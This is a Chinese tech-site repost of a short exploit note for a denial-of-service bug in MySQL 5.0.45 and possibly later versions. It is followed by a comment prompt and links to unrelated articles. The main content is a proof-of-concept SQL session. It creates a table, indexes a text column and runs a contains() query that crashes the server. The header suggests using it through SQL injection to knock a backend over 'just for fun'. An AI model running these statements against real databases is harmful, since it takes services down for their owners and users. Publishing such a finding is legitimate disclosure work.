mysql 5.0.45 (修改)拒绝服务漏洞
/*
* mysql <=6.0 possibly affected
* kristian erik hermansen
* credit: joe gallo
* you must have alter permissions to exploit this bug!
* scenario: you found sql injection, but you want to punch backend server
* in the nuts just for fun. start with the alter table statement on
* a table and field you know to exist. the first two sql statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> create table `test` (
`id` int(10) unsigned not null auto_increment primary key,
`foo` text not null
) engine=innodb default charset=latin1;
query ok, 0 rows affected
mysql> select * from test where contains(foo, ''bar'');
empty set
mysql> alter table test add index (foo(100));
query ok, 0 rows affected
records: 0 duplicates: 0 warnings: 0
mysql> select * from test where contains(foo, ''bar'');
error 2013 : lost connection to mysql server during query
</snip>
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
redis数据库1
大纲:理论:数据库分类Redis重要特性redis应用场景实验:安装redisredis基本操作命令redis持...
[阅读全文]
-
第十五周作业作业
1、导入hellodb.sql生成数据库(1)在students表中,查询年龄大于25岁,且为男性的同学的名字和...
[阅读全文]
-
一致性Hash分析
Hash算法应用场景Hash算法在很多分布式集群产品中都有应用,比如分布式集群架构Redis、Hadoop、El...
[阅读全文]
-
-
-
暑期记录
本周学习MySQL安装使用yum安装所需软件包[root@localhost ~]# yum -y instal...
[阅读全文]
-
-
Kafka控制器
1.ZookeeperZookeeper对Kafka集群的管理操作主要是用了它的两个功能节点(临时节点【zook...
[阅读全文]
网友评论